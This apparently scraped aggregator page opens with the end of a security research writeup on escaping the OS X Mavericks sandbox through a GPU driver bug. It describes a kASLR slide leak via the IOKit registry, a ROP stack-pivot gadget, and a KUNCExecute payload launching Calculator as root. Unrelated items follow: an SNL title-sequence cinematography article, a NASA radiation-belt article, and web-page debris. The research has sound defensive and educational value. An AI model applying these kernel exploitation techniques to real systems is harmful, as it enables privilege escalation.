The second generic mitigation supported at the CPU level is Supervisor Mode Access Prevention. As the name suggests this prevents kernel code from even reading user pages directly. This would mean we’d have to be able to get controlled data at a known location in kernel space for the fake IOKit object and the ROP stack since we wouldn’t be able to dereference userspace addresses, even to read them.

However, Mavericks doesn’t support SMAP so this isn’t a problem, we can put the fake IOKit object, vtable and ROP stack in userspace.

kASLR

To write the ROP stack we need to know the exact location of the kernel code we’re planning to reuse. On OS X kernel address space layout randomisation means that there are 256 different addresses where the kernel code could be located, one of which is randomly chosen at boot time. Therefore to find the addresses of the executable code chunks we need some way to determine the distance kASLR has shifted the code in memory (this value is known as the kASLR slide.)

IOKit registry

We briefly mentioned earlier that the IOKit registry allows userspace programs to find out about hardware, but what does that actually mean? The IOKit registry is really just a place where drivers can publish (key:value) pairs (where the key is a string and the value something equivalent to a CoreFoundation data type.) The drivers can also specify that some of these keys are configurable which means userspace can use the IOKit registry API to set new values.

Here are the MIG RPCs for reading and settings IOKit registry values:

routine io_registry_entry_get_property(

         registry_entry      : io_object_t;

     in  property_name      : io_name_t;

     out properties          : io_buf_ptr_t, physicalcopy );


routine io_registry_entry_set_properties(

         registry_entry      : io_object_t;

     in  properties          : io_buf_ptr_t, physicalcopy;

     out result              : kern_return_t );

And here are the important parts of the kernel-side implementation of those functions, firstly, for setting a property:

kern_return_t is_io_registry_entry_set_properties( 
io_object_t registry_entry,

   io_buf_ptr_t properties,

   mach_msg_type_number_t propertiesCnt,

   kern_return_t * result){

...       

 obj = OSUnserializeXML( (const char *) data, propertiesCnt );

 ...

#if CONFIG_MACF

 else if (0 != mac_iokit_check_set_properties(kauth_cred_get(),

                                                registry_entry,
obj))

   res = kIOReturnNotPermitted;

#endif

 else

   res = entry->setProperties( obj );

...

and secondly, for reading a property:

kern_return_t is_io_registry_entry_get_property(

   io_object_t registry_entry,

   io_name_t property_name,

   io_buf_ptr_t *properties,

   mach_msg_type_number_t *propertiesCnt ){

 ...

 obj = entry->copyProperty(property_name);

 if( !obj)

   return( kIOReturnNotFound );

       

 OSSerialize * s = OSSerialize::withCapacity(4096);

  ...

 if( obj->serialize( s )) {

   len = s->getLength();

   *propertiesCnt = len;

   err = copyoutkdata( s->text(), len, properties );
...

These functions are pretty simple wrappers around the setProperties and copyProperty functions implemented by the drivers themselves.

There’s one very important thing to pick up on here though: in the is_io_registry_entry_set_properties function there’s a MAC hook, highlighted here in red, which allows sandbox profiles to restrict the ability to set IOKit registry values. (This hook is exposed by Sandbox.kext as the iokit-set-properties operation.) Contrasts this with the is_io_registry_entry_get_property function which has no MAC hook. This means that read access to the IOKit registry cannot be restricted. Every OS X process has full access to read every single (key:value) pair exposed by every IOKit driver.

Enumerating the iokit registry

OS X ships with the ioreg tool for exploring the IOKit registry on the command line. By passing the -l flag we can get ioreg to enumerate all the registry keys and dump their values. Since we’re looking for kernel pointers, lets grep the output looking for a byte pattern we’d expect to see in a kernel pointer:

$ ioreg -l | grep 80ffffff

   |   "IOPlatformArgs" =<00901d2880ffffff00c01c2880ffffff90fb222880ffffff0000000000000000>

That looks an awful lot like a hexdump of some kernel pointers :)


Looking for the "IOPlatformArgs" string in the XNU source code we can see that the first of these pointers is actually the address of the DeviceTree that’s passed to the kernel at boot. And it just so happens that the same kASLR slide that gets applied to the kernel image also gets applied to that DeviceTree pointer, meaning that we can simply subtract a constant from this leaked pointer to determine the runtime load address of the kernel allowing us to rebase our ROP stack.
Check out this blog post from winocm for a lot more insight into this bug and its applicability to iOS.

OS X kernel ROP pivot

Looking at the disassembly of unmap_user_memory we can see that when the controlled virtual method is called the rax register points to the fake vtable which we've put in userspace. The pointer at offset 0x140h will be the function pointer that gets called which makes the vtable a convenient place for the ROP stack. We just need to find a sequence of instructions which will move the value of rax into rsp. The /mach_kernel binary has following instruction sequence:

   push rax

   add [rax], eax

   add [rbx+0x41], bl

   pop rsp

   pop r14

   pop r15

   pop rbp

   ret

This will push the vtable address on to the stack, corrupt the first entry in the vtable and write a byte to rbx+0x41. rbx will be the this pointer of the fake IOKit object which we control and have pointed into userspace so neither of these writes will crash. pop rsp then pops the top of the stack into rsp - since we just pushed rax on to the stack this means that rsp now points to the fake vtable in userspace. The code then pops values for r14, r15 and rbp then returns meaning that we can place a full ROP stack in the fake vtable of the fake IOKit object.

Payload and continuation

The OS X kernel function KUNCExecute is a really easy way to launch GUI applications from kernel code:

kern_return_t KUNCExecute(char executionPath[1024], int uid, int gid)

The payload for the pwn4fun exploit was a ROP stack which called this, passing a pointer to the string “/Applications/Calculator.app/Contents/MacOS/Calculator” as the executionPath and 0 and 0 as the uid and gid parameters. This launches the OS X calculator as root :-)


Take a look at this exploit for this other IOKit bug which takes a slightly different approach by using a handful of ROP gadgets to first disable SMEP then call a more complicated shellcode payload in userspace. And if you're still running OS X Mavericks or below then why not try it out?

After executing the kernel payload we can call the kernel function thread_exception_return to return back to usermode. If we just do this however it will appear as if the whole system has frozen. The kernel payload has actually run (and we can verify this by attaching a kernel debugger) but we can no longer interact with the system. This is because before we got kernel code execution unmap_user_memory took two locks - if we don’t drop those locks then no other functions will be able to get them and the GPU driver grinds to a halt. Again, check out that linked exploit above to see some example shellcode which drops the locks.

Conclusion The actual development process of this sandbox escape was nothing like as linear as this writeup made it seem. There were many missed turns and other bugs which looked like far too much effort to exploit. Naturally these were reported to Apple too, just in case.

A few months after the conclusion of pwn4fun 2014 I decided to take another look at GPU drivers on OS X, this time focusing on manual analysis. Take a look at the following bug reports for PoC code and details of all the individual bugs: CVE-2014-1372, CVE-2014-1373, CVE-2014-1376, CVE-2014-1377, CVE-2014-1379, CVE-2014-4394, CVE-2014-4395, CVE-2014-4398, CVE-2014-4401, CVE-2014-4396, CVE-2014-4397, CVE-2014-4400, CVE-2014-4399, CVE-2014-4416, CVE-2014-4376, CVE-2014-4402 Finally, why not subscribe to the Project Zero bug tracker and follow along with all our latest research?

How We Did It: SNL Title Sequence

2 hours 34 min ago

…And we’re back!  After a much-needed summer hiatus, it’s that time of the year again when my comrades in the SNL Film Unit all reconvene on the 17th floor of 30 Rockefeller Plaza for another season of filmmaking speed-drills.

While the usual shoot is a dead sprint from Thursday thru Saturday night, every few years we produce a new Title Sequence and that sprint becomes a 3-week non-stop marathon.  Especially when it’s the 40th Anniversary season.  The passing of Don Pardo — the legendary voice of SNL since 1975 — only amplified the feeling that this new sequence needed to be something extra special.

As always, the titles are a huge team effort.  Our director, Rhys Thomas, spent the summer collaborating with our logo design team at Pentragram Design, led by Emily Oberman, and with our portrait photographer, Mary Ellen Mathews, on a new logo and font design along with a set of mood-boards to experiment with the overall tone of the sequence.  The idea was to honor the 40-year history of the show with something classic and iconic, a little more dressed-up than previous seasons and with typography that was integrated into the cityscape.

Rhys and I started chatting about the title sequence early in the summer as well.  It’s a tough challenge to come up with yet another new and interesting way to shoot what is often the exact same night exterior locations.  What can we do this year that we haven’t done before?  Are there any cool new camera techniques that we can test?  What’s the overall approach / concept?  Is there a narrative thread or is it pure montage?

We bandied about a lot of different ideas: what about hyperlapse – have you seen the incredible videos by Rob Whitworth?  What about super slo-mo – have you seen what the new Phantom4K can do??  For me, the break-through finally came when Rhys mentioned a pretty obscure idea: “There’s this group in Germany doing really cool things with light-writing.”  Uh, did you say light-writing?!

Light-writing is just what you’re thinking: a light-source is traced in the air using a long-exposure.  It’s a technique that’s as old as photography.  In fact, it’s so old-school that when Rhys mentioned it, the first image that came to mind was by Picasso!

It’s pure in-camera trickery…EUREKA! — suddenly we had our approach.  Not just light-writing, but an overall simple, clean concept: as an homage to the 40-year history of SNL, we would approach the sequence using in-camera techniques that would be at home just as well in 1975 as 2014.  Nothing that relies on modern post production techniques or other digital trickery (sorry, hyperlapse’ers).  It would be low-fi, analog, optical, vintage, classic.

Rhys and I – along with film unit producer Justus McLarty — brainstormed a list of in-camera techniques to test: slo-motion, tilt-shift, black&white, long-exposure motion blur, double-exposures, light-writing, timelapse, strobe photography, aerial photography, infrared photography, optical aberrations, anamorphic distortions, prism-distortions, etc.  This was quickly shaping up to be a venture into experimental photography and I admit to being a little nervous about whether the execs at the show were going to think that we had stepped off the deep end. Bear in mind, our job is not to just create a cool montage of New York-y imagery set to music.  The most important task is to introduce the audience to our cast members – in this case, all fifteen of them – and serve as an energetic warm-up for the show.

Shooting fifteen different portraits is a tall order and, in years past, the approach has often been to corral the entire cast to one location — a cool bar, a rooftop party scene, a hip nightclub, etc – and shoot everyone out in one long shoot day.  Then, in 2009, we took a very different approach, shooting each cast member in a unique night exterior location.  This idea happened to coincide with the DSLR-revolution; I shot the entire sequence with a Canon 5DmII, which was the only way we could have captured all of those verite-style, low-light night exteriors at the time.  The 2009 sequence lasted three seasons, replaced in 2012 for Season 38 with a new sequence directed by Mary Ellen Matthews that took a studio portrait photography approach.  For this 40th Anniversary season, Rhys wanted to return to the energy of shooting each cast member out-and-about in the city, even going to the extent of asking each cast member for location ideas: “Is there a place in the city where you’d like to shoot your portrait?” – offering the cast members creative investment in the title sequence and resulting in a really fun collaboration.

The other element of a new title sequence that we have to deliver are the show’s “bumpers” – the interstitial shots that run between the commercial breaks.  So in addition to the fifteen unique cast member locations, we had to come up with a minimum of ten unique bumpers, plus all of the b-roll footage to intercut with the portraits for the montage – all of which must adhere to our new in-camera, lo-fi manifesto.  This was getting complicated…

Rhys, Justus and I, along with our coordinators Melanie Bogin and Tom Carley, and office PA / research whiz-kid Louis Leuci, spent about a week brainstorming locations and testing in-camera techniques, including one rather absurd light-writing experiment involving a whisk stuffed with steel wool, doused in lighter fluid and set ablaze (that idea is still in development).  We quickly figured out that while some techniques were super cool, if we shot the cast members that way, this would quickly look more like a post-modern video installation than an SNL title sequence, so we limited our portraiture to only the most flattering techniques and relegated the more experimental ideas to either b-roll or bumpers.

For the cast, that meant two basic techniques: anamorphic lenses subtly distorted through prisms and…lens-whacking.  So let’s just get this out of the way: lens-whacking is not the coolest term.  Something just doesn’t feel great about saying, “Alright – the lighting looks perfect — now let’s do some lens-whacking!”  So instead, let’s go with the lesser-used term for the same technique: freelensing.  

For those of you in the dark on this concept, FREELENSING (or, ugh, lens-whacking), is a technique where you hold an unattached lens up to the camera’s lens port and manually focus the shot by moving the lens closer or further from the camera.  The technique allows stray light to leak into the port and flare the image, along with creating focus-distortions similar to tilt-shift and macro lenses.  The effect is incredibly volatile; the image is constantly shifting, refracting the optics and internal mechanics of the iris within flare-patterns.  It’s quite gorgeous with the exact kind of analog vibe that we were going for.

A word of caution: this is not the most camera or lens-friendly technique.  Not only is your camera’s sensor completely exposed to dust and moisture but you could accidentally strike the sensor with the rear element of your lens, say nothing of the risk of scratching or dropping your lens.  Some lenses are definitely much better for this than other lenses, and needless to say, I did not attempt to whack a Leica Summilux-C.  Well, okay – I tried it once but thought better of it…

Our camera package came from TCS, where owners Erik and Oliver Schietinger were a huge help in putting together a set of vintage lenses for me.  These were relatively small, Arri-bayonet mount lenses — some of which pre-dated the 1970s.  The size of the lenses was perfect for freelensing — the rear elements could easily fit loosely within the camera’s lens port with plenty of air-space for light-leaks but just large enough that I couldn’t accidentally strike the image sensor.  The set included: Zeiss Distagon 16mm and 24mm, Zeiss Planar 50mm, Cooke Panchro 25mm and 100mm, Kilfit Munchen 90mm Macro and a Zeiss Superspeed 50mm with the unique triangular iris pattern of the earliest generation Zeiss lenses.  I found the 50mm Planar the most successful, though I liked the 90mm for close ups.  Believe it or not, we shot almost all of the cast portraits using this technique: tiny old lenses from the pre-70s, unattached to the camera and hand-manipulated to find focus and allow light-leaks.  In fact, we often created more extreme light-leaks by flaring the sensor with practical lights and even flashlights.

We also carried a set of anamorphic lenses to shoot a clean safety on the cast members in case this freelensing thing ended up looking waaaay too kooky once edited together.  We still wanted the anamorphics to have an optically descontructed vibe so we tested a set of Japanese-made Kowa Prominar lenses – also dating back to the 70s – which had tremendous flares and haze.  They looked amazing but became unavailable at the last second so we opted for a set of the brand new Spanish-made Scorpiolens 2x anamorphics by Servicevision, which are lightweight and gorgeous but a bit too clean for the look we wanted so I held a glass triangular prism in front of them to create refraction patterns and distortions.

Another big hurdle for this freelensing technique was that I wanted to be handheld.  Going handheld with a full size cinema camera while hand-holding a tiny lens and manually finding focus turned out to be pretty tricky.  I knew an Easyrig would help manage the weight of the camera but I’ve never been super happy with the mechanics of an Easyrig.  This device combines a Steadicam-like vest with an overhead arm and spring-loaded cord with a hook that grabs the camera from the top-handle and distributes the camera’s weight into your hips.  It’s a little goofy-looking but it’s an incredible back-saver – vital for anyone hoping for longevity in this biz.  Don’t ruin your back, my friends — your future-self will thank me!  Having said that, operating with an Easyrig can be limiting due to the pendulum effect created by the tension cord.  You can’t really tilt or roll the camera without fighting the cord, and the cord tension can sometimes amplify the bounce/bump of your footstep when walking with the camera.

I had been struggling with this love/hate relationship with the Easyrig for about a year when my fellow SNL DP-compatriot Jason Vandermeer introduced me to a then-prototype rig called the “Gravity-One” from FlowCine, designed to bridge the camera-Easyrig gap: it’s a mounting plate that cradles the camera within a tilt / roll two-axis handle (the EasyRig cord itself provides the pan axis).  I saw the rig in person at NAB this year and thought it looked very promising so I mentioned it to the guys at TCS – who immediately purchased one and let me road-test it on the title sequence.  In short: it’s amazing.  Completely fixes my previous issues with the Easyrig.  FlowCine also makes a spring-arm that mounts to the top of the Easyrig called the “Serene Arm”, which works to dampen those pesky footsteps that get translated into bumps whenever walking with the rig.  I tested both rigs: the Gravity-One and Serene Arm, independently and together.  Independently they’re each an improvement but together they’re the full package and I HIGHLY RECOMMEND seeking out this combo for your next handheld job.

Along with the variety of lenses, we also shot with a variety of cameras.  Our main camera for the cast portraits was the Red Epic Dragon.  While we’ve leaned toward the Arri Alexa over the past couple of seasons, we tried out the Dragon on a handful of spots and found it to be a huge improvement over the (Non-Dragon) Epic.  As advertised, the dynamic range is much closer to the Alexa’s performance while the Dragon offers us a much wider range of resolution and frame rate options.  For a handheld experimental title sequence with lots of different tricks, the Dragon was an easy choice.  We started shooting the cast portraits at 6K resolution at 5:1 compression, thinking it would be very helpful to have a lot of room to re-frame shots, but after the first two cast-shoots (out of fifteen) racked up over 2TB of footage, we quickly dropped down to a more manageable 5K / 7:1 resolution.  For the non-freelensing shots, we rigged the camera with a Redrock MicroRemote wireless follow focus and Teradek Bolt; for most of the shoot, the only monitor on set was a battery-powered 5.6″ TVLogic for Rhys to handhold.  In addition to the Dragon, much of  the bumper-footage was shot with a Canon 5DmIII.  We even shot a couple bumpers with the same 5DmII and 16-35mm lens that I used for the 2009 sequence.

Once we had figured out our camera-approach to the cast portraits, I needed to find a fast but effective way to light them.  The 2009 title sequence was lit entirely with a couple of small LED LitePanels; there was a raw-grittiness to the lighting that I wanted to improve upon while still maintaining the same verite-spirit.  I also had a very small crew for this shoot.  For the titles, I had my Key Grip Mort Korn, Gaffer Sean Sheridan and an AC – a floating roster of Alex Waterson, Alex Martin and Tom Greco.  For the b-roll and bumpers, if was sometimes just Rhys, Justus and me.  Our entire gear package fit into a single sprinter-van.  Bear in mind: this wasn’t merely a budgetary restriction; we were zipping around to 5 locations per night, often in uncontrolled (public) spaces so keeping the crew and gear package small was just smart logistics.  With that in mind, I knew I wanted one beauty light that we could run off house power for locations that we controlled and one battery-powered light for wild locations.  For the big beauty light, we carried a Chimera OctaPlus with a mole-base socket, along with 1K and 500w globes on a 1K dimmer.  For the battery light, our G&E vendor, Available Light New York, built a battery-powered LED-based JEM-ball on a boom pole which they call the “American Hustle” rig (those of you who’ve seen the “American Hustle” behind-the-scenes featurette know what I’m talking about).  My gaffer, Sean, also built an LED-based battery-powered china ball and we were wielding dueling battery-powered china balls for Bobby Moynihan’s bowling sequence.  We also carried my personal set of BBS Area48 remote phosphor LED lights — which are pretty amazing for their high CRI index and high output while battery-powered.

One of the early mantras of this sequence was to create a “Love-letter to New York”, and one of the first visual ideas was to go up in a helicopter and shoot some A-Grade aerials.  (In fact, we’ve been talking about shooting aerials for as long as I’ve been at SNL but in my now fifteen seasons, we’d never actually done it.)  We knew that aerials would immediately add a classic, high-end gloss to the sequence and celebrate the unique and beautiful New York skyline.  There are a lot of ways to shoot aerial footage these days; we could fly a DJI Phantom with a GoPro, mount a Dragon to a Freefly Cinestar drone, handhold a MoVI out an open chopper door…or we could just hire the best aerial pilot in New York – Al Cerullo – which is what we did.  Al’s credits include The Wolf of Wall Street, Spiderman, X-Men, Captain America…pretty much any big movie shot in New York that needs aerials.  Al provided the helicopter, camera operator (Brian Heller) who he’s been working with for years, and CineFlex rig.  We had the choice of either an Alexa-M or an Epic Dragon.  We chose the Alexa because with the Epic, the helicopter would have to land every time we needed to change media or batteries – which would severely eat into our shooting time.  With the M-model Alexa, the camera and lens port are separated by a cable, allowing the lens to be in the gimbal on the front the chopper while the camera body is inside the chopper itself for changing media and batteries.  (Fun fact: the Alexa-M was named “M” for Marie Antoinette…I’m sure you can figure that one out on your own).  The Alexa was mounted with a Canon 30-300mm zoom and set at 800 ISO. One of the coolest moments was a fly-by of Yankee Stadium, where Rhys had somehow pre-arranged for the SNL logo to appear on the jumbo-tron.  We rented the chopper for 4-hours including transit time and ended up with nearly 3-hours of gorgeous footage – and: yes, it was one of the bigger line items on the budget but for the production value they add, great aerials are worth every penny.

With a bed of beautiful aerials as our b-roll base, we wanted to include a street-level version of the same type of smooth traveling footage, so we mounted our Epic Dragon to a MoVI M10.  I’ve recently really loved the combination of the Dragon with Leica Summicron lenses on the MoVI, but I still wanted to maintain an optically-degraded, old-school quality so we picked up a set of Canon K-35 primes (again, from the 70s) – light weight and fast at T1.5.  I asked Sam Nuttman from Freefly Systems (makers of the MoVI) for his best advice for driving shots: insert car? back of pickup? side-door of mini-van?  He actually recommended shooting out of a sunroof, so we rented a baller Suburban and spent an evening driving through the city while I held the MoVI through the sunroof.  Sam was right: the sunroof gave us 360˚ views of the city without the obstacle of the car itself to shoot around.  I’m still amazed at how well the MoVI works in that kind of application.  The car was bouncing around…I was bouncing around…the MoVI rig was bouncing around and getting blasted with wind…the footage was silky smooth.

Our most experimental footage was relegated to the interstitial bumpers – so if you watch the show, watch out for them during the commercials this season.  One of the tricks I was most excited to try was a custom bokeh technique.  This one looks like a magic trick.  As we all know intuitively, when a light source is thrown out of focus – be it a lamp, car headlight, traffic light, etc – it turns into a soft ball of light.  The shape of the out-of-focus light is called the “bokeh” (Japanese term), and is actually a reflection of the shape of the iris of the lens itself.  So here’s the trick: you can change the shape of that round ball into whatever shape you choose by creating a custom bokeh filter.  If the shape of the filter is smaller than the diameter of the iris, the out-of-focus bokeh will magically take the shape of the filter in place of the iris.

Here’s how it works: we wanted the bokeh to be shaped like the SNL logo, such that when we racked focus, every light source in the shot would turn into the logo.  Street traffic would turn into a river of SNL logos, with the logo changing from red to green in the traffic lights…

In order for this effect to work, the logo would have to be smaller than the diameter of the iris of the lens.  In order to figure this out, you need to use a simple formula:

(F)ocal length / (T)-stop = (D)iameter

So a 50mm lens at T2.0 = 25mm diameter.

That means I needed to create a 4×5 filter mask with a logo that would fit inside a 25mm circle.  I brought the logo into Adobe Illustrator, re-sized the logo to fit within a 25mm diameter and placed it within the frame of a 4” x 5.6” rectangle — which is the size of the glass filter I was using.  We sent the Illustrator file to our sign printer who has the ability to print black laser-cut vinyl stickers.  Then we simply took the vinyl sticker and adhered it to a 4 x 5 clear filter.  Voila!  We had a custom SNL-logo bokeh filter.  For these shots, we picked up a set of Leica Summilux-C lenses.  I experimented with different lenses and different sized-filters, but the best results were with the 50mm.

For another bumper shot, we wanted to shoot a tilt-shift timelapse to “miniaturize” an iconic city scene.  Shooting timelapse with a tilt-shift lens is a well-heeled trope, but for those who have never tried it: a tilt-shift lens allows you to “tilt” the focal plane, creating a narrow band of focus.  When you shoot tilted shallow focus time lapse of – say, a cityscape — our brains are tricked into interpreting that bustling cityscape as a miniature, like an electric train set.  Shooting from a slightly high angle (to mimic how you would traditionally look down at a miniature) and with a fairly fast shutter speed to decrease motion blur and create choppier movement helps increase the optical illusion.  In the case of this bumper, we shot out of a 7th floor window at the base of Park Avenue, which offered a perfect high angle shot looking north up the canyon of traffic.  I used a Canon 45mm TS (Tilt/Shift) and shot the scene at F2.8 at 1/25th sec at 800 ISO, with a 1-sec interval between shots.

Coming full circle back to Rhys’ idea that spurred this whole lo-fi concept in the first place, we wanted to incorporate light-writing into one of the bumpers.  After researching local light-writing artists in New York and even investigating a light-writing troupe in Germany, it donned on us that this would be a great way to try out a new toy called the Pixelstick.  Rhys and I had both seen the Kickstarter campaign for Pixelstick a few months ago and I’ve seen some cool images from friends who were early-adopters, but the concept didn’t really sink in until we were on this light-writing trip.

The Pixelstick is one of those amazing ideas that is hard to explain but once you see it, you immediately get it.  In short, it’s a portable, lightweight bar containing 200 RGB LEDs.  You can upload the device with an image in the form of a 200 pixel-tall 24-bit BMP (bitmap) file via SD card.  When you trigger the bar, it flashes your image in a succession of pulses, one vertical line at a time — each LED corresponding to a single pixel.  If you photograph this pulsing with a long exposure and you move the bar across the frame as it pulses, you literally “paint” the image in midair.  I know – very hard to wrap your brain around that until you see it in action, so here’s a little BTS video of the Pixelstick on one of our bumper shots:

And here is how that shot turned out after a 10-second exposure:

Now imagine that’s 1 frame of a 10-second shot.  We shot that same frame over and over until we had about 40 frames.  Technically we needed 240 frames for a 10-second shot but with a few dozen frames, we could sequence a timelapse shot by randomly repeating frames without it being noticeable.  The result is a shot that combines the look of a graphic with a handmade, stop-motion quality — another really fun in-camera trick.

This was just the tip of the iceberg as far as what’s possible with the Pixelstick.  We were lucky enough to have the creators of the Pixelstick – Duncan Frazier and Stephen McGuigan — give us a primer on some more advanced tricks, and we’ve already shot a few other Pixelstick bumpers that will make their appearance in the coming episodes.

The last in-camera bumper idea that we tried was perhaps the most literal.  The bumpers are essentially: a 10-second shot with an SNL graphic overlaid.  But…does the graphic really need to be overlaid in post?  Of course not!  We had the new logo 3D-printed into a physical object about 4 inches tall, and have had a lot of fun shooting an ongoing series of what we’re calling “Makerbot” shots – placing the plastic logo around the city and even on set with us.  If you watched the Chris Pratt / Season Premiere, you might have seen our Makerbot-bumper shot on the set of of our Guardians of the Galaxy parody trailer.

On the post side, the massive task of wading through the 4+TB of footage was handled by editor Sarra Idris in just a single week. The title sequence and bumpers do, of course, incorporate graphics.  Pentragram’s original graphics treatment was for a very cool cathode ray / video-smear look that evoked a retro-80s feeling, but in response to the actual footage, Rhys – along with Emily Oberman at Pentagram and Flame-artist Kyle Derleth – pushed the style back a decade, incorporating the prismatic / optically-distorted quality of our camera original footage.  Kyle also added a subtle motion-track to the titles which made them feel even more like in-camera lens aberrations rather than a post production addition.

Finally, our colorist was the phenomenal Tom Poole from Company 3.  Tom started with a print emulation LUT similar to the one he previously created for Drive, keeping the contrast and colors within the restricted range that could be printed back to film.  Doing so keeps the blacks from getting too crushed and keeps the whites from pushing into the hyper-contrast video realm.  While the result is technically less range than what video can achieve, this is a classic case of “less is more”, resulting in a much richer, more cinematic look.  We had actually planned to incorporate some black & white into the sequence and Tom created an absolutely gorgeous b&w version of the footage but in the end, the color version just had so much pop that Rhys opted against using any b&w.

For me, the titles are kind of like the Olympics or the World Cup — every four years they completely take over my life for about 3 weeks.  This go-round was particularly satisfying to have the opportunity to try so many different experimental in-camera tricks.  The fact that one of the longest running-series in TV history is so open to having its title-branding re-invented with such non-traditional techniques is a credit to both the producers’ faith in our director Rhys and to the show’s own counter-culture roots that began back in 1975, some 40 years ago.  On a personal note, the titles are a rare opportunity to spend more than just a single fleeting day on a project with my SNL team.  While we had a few days of full-scale production, the majority of our 3-week shoot was basically: a few friends hovering around a camera in the middle of the night, trying to come up with something cool.

To see how the final title sequence turned out, click here.

And if you’re interested in learning more about my process, check out my cinematography workshop — available as an HD Download at www.visualstorytelling.com.

NASA's Van Allen Probes Spot an Impenetrable Barrier in Space

2 hours 34 min ago

Two donuts of seething radiation that surround Earth, called the Van Allen radiation belts, have been found to contain a nearly impenetrable barrier that prevents the fastest, most energetic electrons from reaching Earth.

[image-50]

The Van Allen belts are a collection of charged particles, gathered in place by Earth’s magnetic field. They can wax and wane in response to incoming energy from the sun, sometimes swelling up enough to expose satellites in low-Earth orbit to damaging radiation. The discovery of the drain that acts as a barrier within the belts was made using NASA's Van Allen Probes, launched in August 2012 to study the region. A paper on these results appeared in the Nov. 27, 2014, issue of Nature magazine.

“This barrier for the ultra-fast electrons is a remarkable feature of the belts," said Dan Baker, a space scientist at the University of Colorado in Boulder and first author of the paper. "We're able to study it for the first time, because we never had such accurate measurements of these high-energy electrons before."

Understanding what gives the radiation belts their shape and what can affect the way they swell or shrink helps scientists predict the onset of those changes. Such predictions can help scientists protect satellites in the area from the radiation.

The Van Allen belts were the first discovery of the space age, measured with the launch of a US satellite, Explorer 1, in 1958. In the decades since, scientists have learned that the size of the two belts can change – or merge, or even separate into three belts occasionally. But generally the inner belt stretches from 400 to 6,000 miles above Earth's surface and the outer belt stretches from 8,400 to 36,000 miles above Earth's surface.

A slot of fairly empty space typically separates the belts. But, what keeps them separate? Why is there a region in between the belts with no electrons? 

Enter the newly discovered barrier. The Van Allen Probes data show that the inner edge of the outer belt is, in fact, highly pronounced. For the fastest, highest-energy electrons, this edge is a sharp boundary that, under normal circumstances, the electrons simply cannot penetrate.

"When you look at really energetic electrons, they can only come to within a certain distance from Earth," said Shri Kanekal, the deputy mission scientist for the Van Allen Probes at NASA's Goddard Space Flight Center in Greenbelt, Maryland and a co-author on the Nature paper. "This is completely new. We certainly didn't expect that."

The team looked at possible causes. They determined that human-generated transmissions were not the cause of the barrier. They also looked at physical causes. Could the very shape of the magnetic field surrounding Earth cause the boundary? Scientists studied but eliminated that possibility. What about the presence of other space particles? This appears to be a more likely cause.

[image-69]The radiation belts are not the only particle structures surrounding Earth. A giant cloud of relatively cool, charged particles called the plasmasphere fills the outermost region of Earth's atmosphere, beginning at about 600 miles up and extending partially into the outer Van Allen belt. The particles at the outer boundary of the plasmasphere cause particles in the outer radiation belt to scatter, removing them from the belt.

This scattering effect is fairly weak and might not be enough to keep the electrons at the boundary in place, except for a quirk of geometry: The radiation belt electrons move incredibly quickly, but not toward Earth. Instead, they move in giant loops around Earth. The Van Allen Probes data show that in the direction toward Earth, the most energetic electrons have very little motion at all – just a gentle, slow drift that occurs over the course of months. This is a movement so slow and weak that it can be rebuffed by the scattering caused by the plasmasphere.

This also helps explain why – under extreme conditions, when an especially strong solar wind or a giant solar eruption such as a coronal mass ejection sends clouds of material into near-Earth space – the electrons from the outer belt can be pushed into the usually-empty slot region between the belts.

"The scattering due to the plasmapause is strong enough to create a wall at the inner edge of the outer Van Allen Belt," said Baker. "But a strong solar wind event causes the plasmasphere boundary to move inward."

A massive inflow of matter from the sun can erode the outer plasmasphere, moving its boundaries inward and allowing electrons from the radiation belts the room to move further inward too.

The Johns Hopkins Applied Physics Laboratory in Laurel, Maryland, built and operates the Van Allen Probes for NASA's Science Mission Directorate. The mission is the second in NASA's Living With a Star program, managed by Goddard.

For more information about the Van Allen Probe, visit:

www.nasa.gov/vanallenprobes
 

A cloud of cold, charged gas around Earth, called the plasmasphere and seen here in purple, interacts with the particles in Earth's radiation belts — shown in grey— to create an impenetrable barrier that blocks the fastest electrons from moving in closer to our planet.

Image Credit: 

NASA/Goddard

Image Token: 

[image-50]

This animated gif shows how particles move through Earth’s radiation belts, the large donuts around Earth. The sphere in the middle shows a cloud of colder material called the plasmasphere. New research shows that the plasmasphere helps keep fast electrons from the radiation belts away from Earth.

Image Credit: 

NASA/Goddard/Scientific Visualization Studio

Image Token: 

[image-69]

Feature Link: 

› Download this visualization

Kim Dotcom: “I'm broke” (german article)

14 hours 34 min ago

From:Detect language—AfrikaansAlbanianArabicArmenianAzerbaijaniBasqueBelarusianBengaliBosnianBulgarianCatalanCebuanoChineseCroatianCzechDanishDutchEnglishEsperantoEstonianFilipinoFinnishFrenchGalicianGeorgianGermanGreekGujaratiHaitian CreoleHausaHebrewHindiHmongHungarianIcelandicIgboIndonesianIrishItalianJapaneseJavaneseKannadaKhmerKoreanLaoLatinLatvianLithuanianMacedonianMalayMalteseMaoriMarathiMongolianNepaliNorwegianPersianPolishPortuguesePunjabiRomanianRussianSerbianSlovakSlovenianSomaliSpanishSwahiliSwedishTamilTeluguThaiTurkishUkrainianUrduVietnameseWelshYiddishYorubaZulu

To:AfrikaansAlbanianArabicArmenianAzerbaijaniBasqueBelarusianBengaliBosnianBulgarianCatalanCebuanoChinese (Simplified)Chinese (Traditional)CroatianCzechDanishDutchEnglishEsperantoEstonianFilipinoFinnishFrenchGalicianGeorgianGermanGreekGujaratiHaitian CreoleHausaHebrewHindiHmongHungarianIcelandicIgboIndonesianIrishItalianJapaneseJavaneseKannadaKhmerKoreanLaoLatinLatvianLithuanianMacedonianMalayMalteseMaoriMarathiMongolianNepaliNorwegianPersianPolishPortuguesePunjabiRomanianRussianSerbianSlovakSlovenianSomaliSpanishSwahiliSwedishTamilTeluguThaiTurkishUkrainianUrduVietnameseWelshYiddishYorubaZulu

Virtual reality Jobs at Apple

14 hours 34 min ago

You are being redirected to Apple's internal jobs site.

OK

Any selections made in the “Filter by” section will be saved as a current filter mix under the My Filter Mixes tab. Filter retail jobs by weekly hours and position. Some options are preselected. Filter jobs by Locations. Some options are preselected. Filter jobs by Language Skills. Some options are preselected. Filter jobs by Business Lines. Some options are preselected. Filter jobs by job functions. Some options are preselected.

Select the email agent settings.

OK

Job Title Job Function Location Posted

Email job description


Your email request has been sent. Sorry - we are experiencing some technical difficulties. Please try again. Sorry - we are experiencing some technical difficulties. Please try again. Submit your resume without a profile

You are being redirected to Apple's internal jobs site.

Ok

Solving the Mystery of Link Imbalance: A Metastable Failure State at Scale

14 hours 34 min ago

